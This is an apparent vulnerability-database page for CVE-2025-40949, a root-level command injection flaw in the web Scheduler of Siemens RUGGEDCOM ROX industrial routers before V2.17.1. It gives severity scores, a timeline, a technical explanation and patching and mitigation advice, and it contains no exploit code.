Which versions of RUGGEDCOM ROX are affected by CVE-2025-40949?

Siemens RUGGEDCOM ROX industrial routers (multiple MX and RX series) contain a command injection vulnerability in the web scheduler that allows authenticated administrators to execute arbitrary…

How to fix or mitigate CVE-2025-40949?

Within 24 hours: Identify all RUGGEDCOM ROX devices (MX5000/MX5000RE/RX1400/RX1500/RX1501/RX1510/RX1511/RX1512/RX1524/RX1536/RX5000 series) in production and document current firmware versions via device inventory or Siemens automation platform. Within 7 days: Restrict web UI access to the scheduler function to essential administrative accounts only and implement network-level access controls limiting management traffic to trusted jump hosts or out-of-band management networks. Within 30 days: Apply firmware version V2.17.1 or later when released by Siemens to all affected devices according to your change management process, validating functionality in staging environment first.

RUGGEDCOM ROX CVE-2025-40949

Q: What is the CVSS score of CVE-2025-40949?

CVE-2025-40949 has a CVSS 4.0 base score of 8.9 (High). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.2%.

EUVD-2025-209782 HIGH

OS Command Injection (CWE-78)

2026-05-12 siemens

GHSA-pfwq-586r-qjjm

Command Injection

8.9

CVSS 4.0

CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

High

User Interaction

None

Scope

Lifecycle Timeline

Analysis Updated

May 12, 2026 - 10:37 vuln.today

v2 (cvss_changed)

Re-analysis Queued

May 12, 2026 - 10:22 vuln.today

cvss_changed

Severity Changed

May 12, 2026 - 10:22 NVD

CRITICAL HIGH

CVSS changed

May 12, 2026 - 10:22 NVD

9.1 (CRITICAL) 8.9 (HIGH)

Analysis Generated

May 12, 2026 - 10:01 vuln.today

CVE Published

May 12, 2026 - 08:20 nvd

CRITICAL 9.1

DescriptionNVD

A vulnerability has been identified in RUGGEDCOM ROX MX5000 (All versions < V2.17.1), RUGGEDCOM ROX MX5000RE (All versions < V2.17.1), RUGGEDCOM ROX RX1400 (All versions < V2.17.1), RUGGEDCOM ROX RX1500 (All versions < V2.17.1), RUGGEDCOM ROX RX1501 (All versions < V2.17.1), RUGGEDCOM ROX RX1510 (All versions < V2.17.1), RUGGEDCOM ROX RX1511 (All versions < V2.17.1), RUGGEDCOM ROX RX1512 (All versions < V2.17.1), RUGGEDCOM ROX RX1524 (All versions < V2.17.1), RUGGEDCOM ROX RX1536 (All versions < V2.17.1), RUGGEDCOM ROX RX5000 (All versions < V2.17.1). Affected devices do not properly sanitize user-supplied input in the Scheduler functionality of the Web UI, allowing commands to be injected into the task scheduling backend.

This could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system.

AnalysisAI

Command injection in Siemens RUGGEDCOM ROX industrial router series allows high-privileged authenticated remote attackers to execute arbitrary commands with root privileges on the underlying operating system. Affects all MX5000/MX5000RE/RX1400/RX1500/RX1501/RX1510/RX1511/RX1512/RX1524/RX1536/RX5000 models running firmware versions below V2.17.1. The vulnerability exists in the Scheduler functionality of the Web UI due to improper input sanitization (CWE-78). CVSS v4.0 score of 8.9 reflects high impact across confidentiality, integrity, and availability with network attack vector but requires high-privilege authentication. No public exploit identified at time of analysis, and EPSS data not available for this recently published CVE.

Technical ContextAI

This is an OS command injection vulnerability (CWE-78) affecting the web-based management interface of Siemens RUGGEDCOM ROX industrial routing platforms. The ROX series runs a Linux-based operating system with a custom web UI for device configuration. The Scheduler functionality, which allows administrators to create automated tasks via the web interface, fails to properly sanitize user-supplied input before passing it to the underlying task scheduling backend (likely cron or a similar scheduling daemon). This improper neutralization of special elements allows an attacker to break out of the intended command context and inject arbitrary shell commands. The CPE strings identify the affected products as software-level vulnerabilities (cpe:2.3:a:) across multiple RUGGEDCOM ROX hardware platforms, all sharing the same vulnerable firmware codebase. The vulnerability grants root-level command execution because the web backend processes scheduler tasks with elevated privileges, a common architectural pattern in embedded industrial devices where the web server runs with system-level access to configure networking and system services.

RemediationAI

Upgrade all affected RUGGEDCOM ROX devices to firmware version V2.17.1 or later, which includes proper input sanitization in the Scheduler functionality. Siemens Product CERT advisory SSA-081142 provides download links and update instructions at https://cert-portal.siemens.com/productcert/html/ssa-081142.html. Organizations unable to immediately patch should implement compensating controls: restrict Web UI access to dedicated management VLANs with strict firewall rules blocking external access (reduces AV:N to AV:A), enforce multi-factor authentication for all administrative accounts accessing the Web UI, implement privileged access management (PAM) solutions with session recording to detect abuse of legitimate admin credentials, disable the Scheduler functionality entirely if not operationally required (eliminates the vulnerable code path but impacts automation capabilities), and deploy network intrusion detection systems (IDS) with signatures for command injection attempts targeting web parameters associated with task scheduling. Monitor system logs for unexpected scheduled task creation or modification, particularly tasks executing shell commands or scripts. Apply defense-in-depth by running RUGGEDCOM devices in isolated network segments with monitored traffic to critical systems. Note that disabling Scheduler may impact operational workflows relying on automated configuration changes or maintenance tasks, requiring manual intervention.

CVE-2025-40949 vulnerability details – vuln.today

Back

RUGGEDCOM ROX CVE-2025-40949

CVSS VectorNVD

Lifecycle Timeline

DescriptionNVD

AnalysisAI

Technical ContextAI

RemediationAI

Share

RUGGEDCOM ROX CVE-2025-40949

CVSS VectorNVD

Lifecycle Timeline

DescriptionNVD

AnalysisAI

Technical ContextAI

RemediationAI

Share

External POC / Exploit Code